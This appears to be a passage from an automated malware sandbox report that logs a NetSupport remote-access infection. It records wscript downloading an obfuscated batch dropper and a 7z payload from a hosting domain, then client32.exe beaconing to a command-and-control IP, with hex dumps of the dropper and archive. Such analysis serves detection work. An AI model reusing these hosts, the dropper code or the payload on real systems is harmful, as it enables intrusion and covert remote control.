                                                            Aug 2, 2023 10:13:18.467360020 CEST2911INHTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 151Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr \WhE=I=n~7s4}X),,Dq,()4]%y-A9H=n :!b<D)sy+t4Rb'h[TjI
                                                            Data Raw:
                                                            Data Ascii:
                                                            Aug 2, 2023 10:13:18.747426987 CEST2911OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 77Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=l3<(T{EVk9|||$(m$C=M~Sm?sq
                                                            Data Raw:
                                                            Data Ascii:
                                                            Aug 2, 2023 10:14:18.678816080 CEST2914OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                            Data Raw:
                                                            Data Ascii:
                                                            Aug 2, 2023 10:15:18.869443893 CEST2915OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                            Data Raw:
                                                            Data Ascii:
                                                            Aug 2, 2023 10:16:18.944930077 CEST2915OUTPOST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                            Data Raw:
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.34970362.172.138.6780C:\ProgramData\client32.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Aug 2, 2023 10:13:20.125593901 CEST2912OUTGET /location/loca.asp HTTP/1.1
                                                            Host: geo.netsupportsoftware.com
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Aug 2, 2023 10:13:20.176110983 CEST2912INHTTP/1.1 200 OK
                                                            Cache-Control: private
                                                            Content-Type: text/html; Charset=utf-8
                                                            Server: Microsoft-IIS/10.0
                                                            Access-Control-Allow-Origin: *
                                                            Set-Cookie: ASPSESSIONIDCSBQRATC=GPOHJMEAMDACAPKBOFEPOGAM; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                            strict-transport-security: max-age=31536000; includeSubDomains
                                                            X-Frame-Options: SAMEORIGIN
                                                            Date: Wed, 02 Aug 2023 08:13:20 GMT
                                                            Content-Length: 15
                                                            Data Raw: 34 37 2e 31 37 37 32 2c 38 2e 34 32 37 31 39
                                                            Data Ascii: 47.1772,8.42719


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.349698188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2023-08-02 08:13:01 UTC0OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?81197 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-us
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                            Host: mangoairsoft.com
                                                            Connection: Keep-Alive
                                                            2023-08-02 08:13:01 UTC0INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 02 Aug 2023 08:13:01 GMT
                                                            Content-Type: application/x-msdos-program
                                                            Content-Length: 1908
                                                            Connection: close
                                                            Last-Modified: Thu, 27 Jul 2023 14:27:09 GMT
                                                            ETag: "774-60178c25fc517"
                                                            Accept-Ranges: bytes
                                                            2023-08-02 08:13:01 UTC0INData Raw: 40 65 63 68 6f 20 6f 66 66 0a 0a 3a 3a 20 52 31 31 66 66 73 52 73 66 73 52 62 0a 3a 3a 20 33 5a 36 66 4b 66 73 52 4b 66 73 52 62 0a 0a 73 65 74 20 22 66 64 61 61 3d 73 65 74 20 22 0a 25 66 64 61 61 25 22 66 64 67 78 76 78 63 76 78 63 3d 43 3a 5c 50 72 6f 67 22 0a 25 66 64 61 61 25 22 68 67 68 67 64 67 64 66 73 7a 3d 72 61 6d 44 22 0a 25 66 64 61 61 25 22 68 79 74 75 72 64 66 67 66 3d 61 74 61 5c 22 0a 0a 3a 3a 20 52 31 31 4b 66 73 66 66 73 52 73 73 52 73 52 73 52 52 62 0a 3a 3a 20 73 73 52 73 52 66 73 52 73 52 52 62 0a 0a 25 66 64 67 78 76 78 63 76 78 63 25 25 68 67 68 67 64 67 64 66 73 7a 25 25 68 79 74 75 72 64 66 67 66 25 0a 0a 73 65 74 20 22 66 67 64 67 68 3d 73 65 74 20 22 0a 25 66 67 64 67 68 25 22 76 62 6e 76 62 76 3d 57 73 63 72 22 0a 25 66 67 64
                                                            Data Ascii: @echo off:: R11ffsRsfsRb:: 3Z6fKfsRKfsRbset "fdaa=set "%fdaa%"fdgxvxcvxc=C:\Prog"%fdaa%"hghgdgdfsz=ramD"%fdaa%"hyturdfgf=ata\":: R11KfsffsRssRsRsRRb:: ssRsRfsRsRRb%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%set "fgdgh=set "%fgdgh%"vbnvbv=Wscr"%fgd


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.349699188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2023-08-02 08:13:02 UTC2OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z HTTP/1.1
                                                            Host: mangoairsoft.com
                                                            User-Agent: curl/7.55.1
                                                            Accept: */*
                                                            2023-08-02 08:13:02 UTC2INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 02 Aug 2023 08:13:02 GMT
                                                            Content-Type: application/x-7z-compressed
                                                            Content-Length: 2306944
                                                            Connection: close
                                                            Last-Modified: Thu, 27 Jul 2023 14:02:55 GMT
                                                            ETag: "233380-601786bbd2554"
                                                            Accept-Ranges: bytes
                                                            2023-08-02 08:13:02 UTC2INData Raw: 37 7a bc af 27 1c 00 04 62 94 ad 89 3b 33 23 00 00 00 00 00 25 00 00 00 00 00 00 00 bd 7d 05 34 e0 1b b1 06 4e 5d 00 06 82 cb 94 d3 b9 af f7 1e d4 db db 26 fe 12 c2 40 84 0b ca 5a 74 41 a5 34 05 82 78 3d 69 f9 1a 84 68 af 35 e1 8b 55 42 68 d8 4b a5 de e9 e9 9e 4b 42 7d 22 47 41 bd cc 0e cb d2 0c 2e 18 9d db 78 b3 e6 e2 c7 e7 36 ff 63 8a 38 ec f2 56 ac 3e a9 8a 33 ba 33 a3 7e c2 dd a8 1e 62 8e af 58 c3 d3 08 ed f6 1b 57 d8 62 c6 f4 a1 77 f7 19 db ec 8d 75 62 51 00 a2 a3 68 5b fa b4 16 0d 60 bf cc 33 29 87 ac b4 91 3e cc a8 0a e2 ee 0f b7 55 05 96 4b 13 ec 59 e2 30 7d 28 ee 67 a3 a1 37 e2 84 d2 ab 62 72 77 92 c2 79 d5 ef 15 10 2f 33 7a cb 74 f6 de 9c 0d 2c d2 67 a5 40 f4 ac 92 61 4a c2 9d d1 7f 8e f8 99 30 4b 0c 96 12 aa c4 d2 d1 f2 27 51 d6 ec 06 9e f3 fd
                                                            Data Ascii: 7z'b;3#%}4N]&@ZtA4x=ih5UBhKKB}"GA.x6c8V>33~bXWbwubQh[`3)>UKY0}(g7brwy/3zt,g@aJ0K'Q
                                                            2023-08-02 08:13:02 UTC18INData Raw: 20 a1 58 17 00 5c de 14 66 93 6e 4d e6 0f 0d ec 4e 9a f7 0d d3 c0 ec b2 50 4f 23 af b6 9c e4 9e 86 1f 2c 28 d8 72 1d 14 3a 77 40 be 76 d9 d5 08 0b 27 b4 15 6e 50 48 83 9b ba b5 39 7e 63 9a 91 da 1f 0d c4 59 da 7f 8b 43 02 34 9c f2 5d 1d 01 25 52 70 eb 3e 89 2a f0 2a e3 76 ee 1b 8c 1d 69 06 51 fc 25 bb 7a 34 17 bf 70 91 ba 22 db a5 4a 57 11 7e ab 1d c7 77 12 24 7d 1f 16 26 24 85 04 b5 d9 99 63 85 cc cd 90 34 2c 1f 24 31 0d 13 ef 05 7e 89 2f 8d 70 b9 aa 25 75 51 d5 ab 20 d1 e7 b0 d7 6a 28 f8 ad 0e e2 04 c9 e4 cc 07 bd 51 af 5a 42 18 b1 1f 10 9e ab c3 74 ae 3f d1 a6 80 be 92 8d 39 05 9a 75 7b 10 94 53 44 db 94 7d ad 05 8d 30 07 0f e0 ea e6 d4 52 23 58 6b c3 84 b0 5d 17 56 11 59 83 e3 92 ad d0 26 22 a5 70 60 77 cd 68 de 65 38 13 16 a3 33 ba 26 56 ab 03 f3 cf
                                                            Data Ascii: X\fnMNPO#,(r:w@v'nPH9~cYC4]%Rp>**viQ%z4p"JW~w$}&$c4,$1~/p%uQ j(QZBt?9u{SD}0R#Xk]VY&"p`whe83&V
                                                            2023-08-02 08:13:02 UTC34INData Raw: 38 27 45 be 2c f7 1e 6e 22 d1 5b 21 f0 a4 45 8f c4 f2 bf 48 84 4c 1d e1 d3 79 7a c1 71 5e a8 0c 3c d7 28 2c f8 dd 60 ef 73 15 a8 7f 03 20 a6 e5 39 83 fa 82 0e a9 fd 2e 46 d8 49 ca c9 18 27 60 d6 20 de 75 30 ce 3d c1 7b 16 30 1f 9b cd c6 13 d4 a6 29 f7 70 da 5a 02 ab c8 0e 09 96 79 c0 e8 13 bd e9 72 b0 3f c9 35 35 bc 9d 0a 2a 3b 79 cc aa 6e d6 a2 a9 3c 33 9a 4c 0a 5b 49 3c 74 05 9b ae cf f4 dc 59 86 ba 4a ad a5 25 f6 a7 0f 44 d7 bd b3 74 96 9d be d6 3c 03 23 e3 f5 57 41 ed 7e 70 7c d2 91 59 08 08 3b ef a6 e4 d9 b9 dc fa e5 73 56 12 cd d6 05 3f 90 7b 6f 61 fd 59 8a 79 52 13 78 cd a7 9d 97 50 f6 0b c0 b7 25 ee af b3 bc ae 55 3a 5a 7a 36 c4 a1 0a 47 bf ad 1f f6 6e 8a 7a 31 cd 2f 8d dc b1 81 6f d5 7a 05 26 80 8f 20 46 27 a4 43 cb 71 4b 3b 3f 4a e8 51 67 35 44
                                                            Data Ascii: 8'E,n"[!EHLyzq^<(,`s 9.FI'` u0={0)pZyr?55*;yn<3L[I<tYJ%Dt<#WA~p|Y;sV?{oaYyRxP%U:Zz6Gnz1/oz& F'CqK;?JQg5D
                                                            2023-08-02 08:13:02 UTC50INData Raw: f1 57 ce 65 46 f3 a2 05 d3 1e 75 34 50 05 ee 13 94 27 62 02 89 fd 39 1e d7 ef d0 12 c5 cc 43 30 6d 3a f1 31 33 e4 b5 e0 14 5a 6c fb cd b2 80 73 d1 c1 ea 45 51 ca 18 88 2c 52 4f 2f 3f 3a d6 b6 6e 32 e0 08 94 72 2c be 66 2c ed 90 5d b9 0b 1e 82 86 95 11 fc 15 a7 d4 43 93 71 ba 17 53 28 57 78 6a 6d 5a 5f 97 f9 26 50 b8 e7 8d e2 9b 3a 01 c3 2a b6 f5 88 e0 13 42 86 48 03 39 ac 20 c6 ab 64 85 e5 78 47 47 59 57 2b 5f 64 8e c7 21 d5 73 ec 4f 9f db f9 12 99 cc e5 dc 8b df 1a ba 8b 0d 18 ec eb ff 76 af 6a 25 5d 89 68 0e 1a 6c 55 fb c1 fa 6f d0 9f b2 e0 ba e7 bc dd 94 f6 f4 65 68 25 ed 34 22 7d 37 4c a6 68 08 3e 43 3d b5 69 ac a5 43 d5 4b d6 b3 2a 6b 77 5f 08 11 ba 63 d8 68 da 98 17 b0 45 c2 6b 3e 00 f0 f3 1c 66 97 74 79 e7 2a 03 11 23 bb 99 81 86 b2 8b e5 27 95 2d
                                                            Data Ascii: WeFu4P'b9C0m:13ZlsEQ,RO/?:n2r,f,]CqS(WxjmZ_&P:*BH9 dxGGYW+_d!sOvj%]hlUoeh%4"}7Lh>C=iCK*kw_chEk>fty*#'-
                                                            2023-08-02 08:13:02 UTC66INData Raw: 1d ca 0d d7 81 55 36 0f 11 a0 78 f5 8e f1 b9 74 f8 3a ef 1e b9 69 d9 da ec 8e ea b0 05 30 6a d8 f4 8f 04 61 93 9d 9f 58 55 56 b5 58 0e 4e ae e6 e5 e2 9b 6d e6 7a 78 cc 53 93 28 3f 34 a9 23 4c 29 b3 7a e1 5a c8 91 a2 ba f5 9f e4 0c 42 da ce 17 24 a7 fb a5 58 64 88 04 d0 44 6a 93 f3 c1 af e6 8d d8 87 f0 b8 85 fc a9 a6 f5 a6 ad bf 07 c1 b4 c5 c8 ed eb 26 82 b3 3c dd 10 eb 61 87 4e 2d bf 08 bf 66 28 be 12 de 14 1f 2f ab 2e a1 a8 b2 5f da 9c 41 c9 6f 6b 4c 7a 04 21 7f 82 6e e8 8e 7b 46 bc 15 e7 bd 37 b8 a7 6b c8 0a 8e a4 6f 28 99 01 7d 1d 22 b6 a5 dd e0 05 96 0b 09 c2 27 96 09 15 48 ec 80 4b d6 d7 9f 49 02 1a 08 d3 6d 93 25 c1 79 15 fc 2b c9 c9 9b a5 01 f3 e8 f9 0b 80 26 9f 07 0b 4e d1 7c 65 d1 d7 5f ae 3f a7 7c 30 91 ce c1 e8 b6 d9 6b 9c c4 29 36 be 4f ba 0b
                                                            Data Ascii: U6xt:i0jaXUVXNmzxS(?4#L)zZB$XdDj&<aN-f(/._AokLz!n{F7ko(}"'HKIm%y+&N|e_?|0k)6O
                                                            2023-08-02 08:13:02 UTC82INData Raw: bf 83 7f e1 a3 bc 15 5a 32 72 cd 06 d5 3b 9d 67 43 4d 24 e8 0e ea 69 ad bd f5 09 fd 0f 29 6d cd 0c 63 c8 05 e0 79 71 c5 59 d1 e6 68 c5 14 96 cb b6 a9 17 0b ef 44 1c 50 57 fe c1 a5 d3 fc d9 d6 b8 5d 39 c5 5f 0f a6 ef 5b c0 d7 36 76 9f ac 06 e9 b4 ac 98 ba 2a 38 8e d1 14 22 94 fc 9e 55 1c 12 b9 33 0b 6c 0b 8a 9a f0 21 b0 98 da 02 1e 87 5b 6f b0 ff 43 d2 c5 f0 6e 16 14 2e ed 15 9c 4e d1 ce 19 f4 b4 e7 d3 b7 b3 7f 78 8d a6 1c c2 a1 27 7e d3 15 ea 1f a2 97 89 47 7f 60 3c 4e 99 d2 bf 5e e4 8f 40 20 a1 e7 07 b4 92 02 66 ca 03 94 5d d8 29 e2 af c2 b3 f5 58 9b 32 c1 fe 0e e1 7d e8 93 e2 f7 ac 52 77 39 db a8 e4 73 9a 31 f9 cd 31 1d 7a 14 9f 20 4e 76 cb a9 2d b1 d1 66 b9 a7 ab 7e 57 e4 aa c8 c4 d4 66 34 8d 42 9d 51 c9 12 3c d5 ad 00 c1 6b 77 22 dc 77 20 22 f5 4d 57
                                                            Data Ascii: Z2r;gCM$i)mcyqYhDPW]9_[6v*8"U3l![oCn.Nx'~G`<N^@ f])X2}Rw9s11z Nv-f~Wf4BQ<kw"w "MW
                                                            2023-08-02 08:13:02 UTC98INData Raw: 7f 7e 8e 38 2a e7 74 1b 62 ea c6 d4 7e 8d 8b 71 b9 85 58 30 83 69 5b 12 1d 4d 22 f2 39 b6 80 8c 23 3f 09 f4 45 88 f4 05 c6 18 6e dd 99 2e 0c 7a 0e d2 27 f5 2a 56 90 a8 58 99 29 58 ea fd b7 70 a1 c0 a0 d6 a9 de ce 40 a3 77 50 d5 e6 71 44 4f 43 c4 90 49 41 93 01 ed 2a af f7 08 c4 dc 07 db eb 6f 88 a1 e7 33 15 cf 62 07 a1 42 05 26 08 35 ef 95 f8 56 5d d5 6e f3 ca b1 c0 86 bd 43 4b eb 3e e6 46 44 4c 27 18 ba 4e cc d1 c2 07 c4 ec 69 87 9a c7 12 bd 71 9e 19 cd 51 df d7 a6 e2 b7 2d f2 12 5d cf 70 5b 22 99 48 d2 3b 60 1f 89 c5 0d ad 52 28 70 1a d0 81 2c b1 e7 6f 1b 33 70 22 98 bc 22 d9 75 93 f3 f0 94 ee 57 56 79 3a 52 57 2c 1b f7 2a 08 b3 7e d8 6d 2e 9e 53 79 f5 00 57 e1 4a b4 f1 9a 81 22 a2 6b dc 2a 69 dd 3d d9 d9 c9 3c 73 d0 8b 1c d5 1d 71 dd 0d c4 8d cd 21 f9
                                                            Data Ascii: ~8*tb~qX0i[M"9#?En.z'*VX)Xp@wPqDOCIA*o3bB&5V]nCK>FDL'NiqQ-]p["H;`R(p,o3p""uWVy:RW,*~m.SyWJ"k*i=<sq!
                                                            2023-08-02 08:13:02 UTC114INData Raw: 2c 80 a3 55 08 82 d6 cf 94 59 0e 12 21 ea bd 66 f8 b6 f9 a3 c8 9d 44 56 73 93 de cf fe 6a 50 a0 d2 3f 61 97 69 79 8f dd 4f 89 1d b9 6f 39 e2 e5 26 7d e3 e1 6d 56 13 fe 72 61 dd 36 76 0f 27 7c 48 2f a1 06 5f b4 33 87 c3 6b 65 83 17 d8 a3 dc db 30 29 8b 74 45 32 60 fd 3f 79 50 1e 36 77 40 fc 8d fe 20 0d 60 94 73 8c ec 17 07 14 57 fc 17 21 80 bf be 8e c7 22 af 6e 0e 56 81 71 04 f4 c2 4f 9b 60 85 4a 9f f2 29 e0 86 db b3 f1 cc 04 f4 53 dd 94 df cb da bb 8f f9 5c ce f5 f4 9a e8 60 6e 39 8b 89 b9 99 3e 70 d5 50 07 fc 78 a7 88 8e df 3f f0 a9 10 a8 c1 b6 9b d4 4d 8b 5a f3 7e 7c 1e 14 f5 0d 5c f8 d0 41 be 0b 07 f2 a9 63 ec 24 7b 9f a4 d6 3e 13 c3 28 52 b7 08 ab 98 f2 af 3b 0c f0 16 66 a1 f7 a2 66 3a d3 40 b3 4c a2 09 13 38 69 d6 60 9c df 79 71 b4 01 47 d5 5f c7 83
                                                            Data Ascii: ,UY!fDVsjP?aiyOo9&}mVra6v'|H/_3ke0)tE2`?yP6w@ `sW!"nVqO`J)S\`n9>pPx?MZ~|\Ac${>(R;ff:@L8i`yqG_
                                                            2023-08-02 08:13:02 UTC130INData Raw: 1c 1b 35 5f 31 b1 08 e7 a3 a1 9a ee ae 53 42 f1 63 d7 15 c4 71 57 52 19 fb f2 f6 65 dd bb 37 d7 68 26 a1 7d 54 6d e0 86 58 08 18 23 85 83 36 e9 c1 4b 54 29 2f b2 1b 06 90 db 09 4f c4 69 c2 e3 81 2d aa 8b e0 75 93 cc 7e 5c f2 e8 60 92 66 e2 93 90 00 fb 6d 93 cf a7 68 12 84 55 07 e3 8b 48 e9 b2 57 d4 11 d0 78 c4 b4 3a c9 3a 96 9d 04 b9 48 3f 96 53 97 7d 17 10 f0 02 86 b7 c6 54 63 55 19 70 8c ad 00 b0 0d fa 99 06 e7 0a 7b c7 da 9b 3c 06 56 7a 66 d9 9e c0 9a ac 53 99 4d 7a df b6 f7 83 2f 8d d4 f2 6e c1 97 76 fc 48 6c e8 d7 03 e8 76 44 3e b4 89 05 d1 53 11 4e 48 56 c9 90 77 36 80 7b 60 22 bb 57 40 f1 26 ee 58 69 45 52 56 af 07 4a 6d a9 20 ef 7d 5c 80 ea 8a 3e d7 ae 8a 06 10 ca ca 7b 84 3d 11 d9 0c 3a d9 d7 55 16 8a 78 4b 38 a1 4a b8 82 01 07 9e a5 4a dc 05 e3
                                                            Data Ascii: 5_1SBcqWRe7h&}TmX#6KT)/Oi-u~\`fmhUHWx::H?S}TcUp{<VzfSMz/nvHlvD>SNHVw6{`"W@&XiERVJm }\>{=:UxK8JJ
                                                            2023-08-02 08:13:02 UTC146INData Raw: 7d db a1 98 8b 0b 32 2a 7c 4d 92 75 97 9d e5 fc 13 17 34 7d b3 4a ec c9 6e ab a0 c3 31 a2 aa 17 69 f7 4f a9 ec 5c e6 10 11 cf af a1 3c 10 9a f6 7c cc 29 dc 18 04 7a bc a9 14 8d 67 3b 22 ff 94 fd f8 c1 6a ae 8e c4 3b bd 42 ba 97 4f f3 10 34 5e ce 1d ee ac 29 b2 e3 f3 b7 5f df 35 48 03 63 7b 91 1e a6 dd 5e 42 58 e9 f4 36 05 5a ae c5 6f f5 cc 11 ef 31 d4 d1 6e e1 3f 81 eb e5 b2 48 9f 15 fb 02 90 f7 73 96 5c 38 8c 91 b5 de 6a 88 51 87 e2 fe 27 8f b4 50 9d d9 5d 8a 54 5b bb 39 f0 49 a8 4c d6 a2 aa 23 1e e6 70 fe 64 8a 95 c1 a8 e2 d0 92 f9 1f 1f b0 c9 9c b4 74 68 b8 8d 23 6d e8 f8 f8 f3 3e 74 48 d7 e3 a2 f5 60 60 a5 7b bc 1b 59 9f 33 9e ef 05 73 a8 f2 3b d6 85 37 89 3c ee 88 d3 41 b1 23 de f4 02 dd 22 0e 29 3e 01 9e 08 b1 8a b2 da 68 6b 5d 3d 0f 5f a0 ea 4d ee
                                                            Data Ascii: }2*|Mu4}Jn1iO\<|)zg;"j;BO4^)_5Hc{^BX6Zo1n?Hs\8jQ'P]T[9IL#pdth#m>tH``{Y3s;7<A#")>hk]=_M
                                                            2023-08-02 08:13:02 UTC162INData Raw: 8c 17 75 39 7d 85 5e e0 8d 48 4e 9f 46 a1 35 82 c6 49 18 09 3f f4 6d 3a 03 a2 be 60 4c 59 41 2e dd 59 70 75 ab d5 ca 4c 16 a9 88 17 54 b6 05 b7 88 b8 26 77 01 b9 4e 71 25 e9 3d 34 bb 69 3e 40 e1 8f d4 a3 88 d1 54 0b 12 ec 27 39 f6 a4 57 a2 f3 b3 5b 86 e7 89 87 26 0c fd d0 e0 00 4a 42 47 26 84 ca 0f 26 c0 48 eb f4 c0 f1 c2 5f 9e a0 a9 91 0c d0 3d b2 bd 97 54 cf f9 2d 7f 39 b3 be d5 90 fe d6 5f ad 58 30 8d 1d 2b 25 2a 08 ae 57 f0 7d a3 a3 c4 cf b4 c6 4e b3 dd 14 a3 dc ce 7e da ad 75 20 d6 01 70 b6 25 df 0e eb c2 c4 92 f0 12 02 10 38 12 c1 86 df 1d 20 c8 a1 07 5f e5 c7 e0 c2 62 d1 2b ef 0e f4 e6 20 26 b7 ad c1 5e 68 08 46 44 9c f4 fd 97 cc f5 5d b8 4a 00 39 56 4f d2 46 60 54 7f 3f 9f e9 23 90 b8 ad b7 3c 8e 82 4c 4e ce 3e 7d dc 9b f7 1f 4e b8 e1 94 0d 36 24
                                                            Data Ascii: u9}^HNF5I?m:`LYA.YpuLT&wNq%=4i>@T'9W[&JBG&&H_=T-9_X0+%*W}N~u p%8 _b+ &^hFD]J9VOF`T?#<LN>}N6$
                                                            2023-08-02 08:13:02 UTC178INData Raw: c6 30 7f 56 6f 91 54 9b 0f c1 50 8a 90 5d b4 4c 73 64 bb 05 6b cf bf 16 e1 92 c9 47 b0 d0 0e 87 f1 f6 b1 24 bc 3e 08 91 9b 4b 6c 6a 9a 23 5d 85 fc ca 7d cd dc 1f 65 17 e9 41 d0 81 90 5f fd 41 ed bd 6c 85 6e e7 ab ea ba 1c 46 a3 c9 06 8e ea 16 68 94 b2 7e 27 ef fb a8 3b eb e5 81 35 75 bf 9c f4 43 f6 ca d8 87 27 fd c6 6b 4f b2 3f 93 cf d0 6a 59 d3 f2 d5 3d fc 2e 08 e3 68 72 ee 3d 72 ef e6 30 e4 66 e5 f7 89 bf 3a 20 93 48 18 80 6e 07 df df a0 71 0b ca 43 8b 49 bd 42 40 83 46 d2 71 1c dd 29 2b 3c 1a db d7 77 31 10 73 8e 2c a0 98 98 ab 95 46 5f de 40 8b c7 63 51 5d 80 2a 0d 93 16 d9 e0 38 47 f3 6f 46 51 02 e5 33 8c 09 52 f6 de 84 c7 11 7d 20 22 16 11 57 46 87 75 44 ec 12 0a e9 30 06 7b 8c 2e b4 d1 10 bd 2e 7f 78 79 27 e4 cd c1 6a 9d 74 0d 9f 6b 4e e2 6d 79 c2
                                                            Data Ascii: 0VoTP]LsdkG$>Klj#]}eA_AlnFh~';5uC'kO?jY=.hr=r0f: HnqCIB@Fq)+<w1s,F_@cQ]*8GoFQ3R} "WFuD0{..xy'jtkNmy
                                                            2023-08-02 08:13:02 UTC194INData Raw: 6d cd fe f3 ab 5a ad 11 a6 2a 1e ce 5a 23 33 aa d5 a9 ca 9a 32 d3 15 a2 5b d3 20 27 99 11 da 1b 79 a2 74 12 3d 92 9a e3 39 af e9 e6 49 a8 d0 94 8c 1f 36 52 f1 9c c1 17 da ba 20 55 d6 99 19 77 b4 0c 26 ce 09 37 73 4f 78 56 82 65 51 d8 9b 65 5d 45 e5 d7 db 6a 16 76 b5 99 04 f7 a3 a7 77 8e dd 37 e7 68 f9 db 9c f3 34 64 c0 ca c4 05 71 9e e2 f7 8f 06 f6 e5 ba f5 4e 61 bc 09 5b 46 cd bf 4a 1d a2 72 ee 5f a5 3f b8 5c 9b f8 95 c4 e3 ed 26 4e 56 a8 ed 5c 1e da c8 35 3d cb a3 6d ce fa 8a 69 11 36 55 12 34 11 95 29 cf 18 2f 17 1b f9 95 13 f6 05 19 b5 5d fb 89 91 11 45 24 5e a7 a7 3d ce da f4 ba 04 2d 09 87 08 5d 5c 7d a4 24 1a 31 6f c2 80 3b b9 93 66 04 48 a3 9b 40 63 88 36 04 f8 95 48 14 c5 3f 2e 1f 50 11 be d8 1a d6 34 9a 33 03 1a ae be 41 9d e1 40 32 46 62 7c cd
                                                            Data Ascii: mZ*Z#32[ 'yt=9I6R Uw&7sOxVeQe]Ejvw7h4dqNa[FJr_?\&NV\5=mi6U4)/]E$^=-]\}$1o;fH@c6H?.P43A@2Fb|
                                                            2023-08-02 08:13:02 UTC210INData Raw: 25 76 4f 5a e8 f5 f3 3e 6a c2 01 1c 5c 6a 86 f9 be ee 51 bf 45 18 56 ad b5 88 8c 3b e5 17 53 ef b8 a3 1a be cf 11 6f db a7 88 92 9b 5f 7d ac 76 2f ba 33 bb 7f 09 0c 43 00 e3 66 0b 38 3e e4 ed 19 dc e2 ea b1 da f6 a0 91 e5 05 6d 34 4b 5f 4c 8e df 07 d2 a6 b9 ef 72 eb b4 3f cd 01 77 1b fe 7b c8 5a a4 65 c5 82 3d 3d 59 80 6b 7f 11 92 36 d1 fe 75 b5 40 97 8c fe 1d 01 02 32 19 95 0d 89 b5 4b ba bf 5c 76 bd 42 b0 70 ce c9 9f c2 c1 88 03 8a d9 35 66 ca 3f f2 cf 35 33 1e 50 7f 5d f1 8b fb e7 b7 f8 48 51 28 2b 34 6b b4 ad ff 1b ae d3 70 89 0f 05 0f f6 5c a3 97 18 d4 d6 de 73 8b 87 de be ed b8 9e 97 f8 79 38 e8 0a 95 e5 41 8b 60 fd f3 34 9f 36 d9 c1 81 1a 88 13 8b 56 c1 8b b7 75 50 e9 43 9f 73 49 28 50 04 0a 5f 1d 37 bf 6e fe b8 6e 41 47 73 4d fb 5d 32 38 bf c1 9c
                                                            Data Ascii: %vOZ>j\jQEV;So_}v/3Cf8>m4K_Lr?w{Ze==Yk6u@2K\vBp5f?53P]HQ(+4kp\sy8A`46VuPCsI(P_7nnAGsM]28
                                                            2023-08-02 08:13:02 UTC226INData Raw: 20 f8 49 24 84 ea 6b 3c b6 e7 f8 6a 67 62 6d c8 f6 51 55 f3 5a ea 75 85 0d 32 2e c0 80 91 c6 fb 00 56 d2 51 25 ec eb ee 9d 65 46 ba 28 73 91 56 ea a3 a2 11 fe 15 a6 b6 6b 55 0b 5b 5f d8 e4 5f 45 ae 7b 2f a3 be c7 a0 21 2b 90 79 0e 26 d8 e9 76 ae 01 83 89 87 2e 2c 02 f7 fc 93 ae b0 cd 41 e6 90 76 9a 7f b7 ba 3c 6a d1 2d da f8 ee 1b 60 90 a0 af 99 b6 24 68 0d ed 5f d8 42 83 69 71 7b 94 2e 8f ba 32 46 a8 4f 10 f8 d6 3c 22 ca 3c 2c 26 8b 60 7d 5a 99 0b 07 4f 8b c7 db 66 52 82 a9 31 1e 2e b9 ea f9 b3 8c f5 78 33 c4 ef d6 6a 2a c8 3e 59 83 12 48 cc cd 97 c0 66 cb 46 13 3b 25 7d ef ff b6 08 1a ee 7d 1b 58 a3 1e 45 9b 90 1b 7f b1 eb 3a ca ad 01 44 51 b8 51 db 85 65 d7 89 d5 68 65 19 26 92 55 fb 8c 23 8a 0f 34 38 fc 84 d7 00 27 9e dc 90 df 9f 6b 29 ec 0f 96 9c a0
                                                            Data Ascii: I$k<jgbmQUZu2.VQ%eF(sVkU[__E{/!+y&v.,Av<j-`$h_Biq{.2FO<"<,&`}ZOfR1.x3j*>YHfF;%}}XE:DQQehe&U#48'k)
